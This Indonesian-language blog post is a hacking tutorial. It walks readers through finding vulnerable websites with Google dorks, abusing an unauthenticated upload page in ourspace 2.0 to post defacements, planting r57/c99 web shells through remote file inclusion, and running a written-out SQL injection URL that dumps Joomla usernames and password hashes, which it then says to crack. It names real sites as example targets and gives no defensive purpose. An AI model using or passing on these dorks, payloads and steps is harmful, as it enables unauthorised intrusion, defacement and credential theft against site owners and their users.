pertama2 buka milw0rm,
Contoh target adalaha ourspace 2.0
pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.
1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.
2. Setelah itu cari situs yang mau di cuba
misalnya neh :
- Code:
http://www.2coolcode.com/cgi-bin/ourspace//login.cgi
3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
- Code:
/cgi-bin/ourspace/newswire/uploadmedia.cgi
4. Setelah itu muncul upload files
5. Lu bikin html yang bagus terus upload dah...
Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja dihttp://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.
- Code:
- http://milw0rm.com/exploits/1779 - http://milw0rm.com/exploits/1913 - http://milw0rm.com/exploits/4276
selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)
3. Selamat mencoba !
SQL Injection
--------------
Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177
1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.
2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :
- Code:
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*
3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan inihttp://thesoftwareengineer.org/services/md5.php
4. Selamat Mencuba
Tidak ada komentar:
Posting Komentar
Kalau ada masalah Comment aja, tambah alamat e-mail untuk balasanya.. .. ..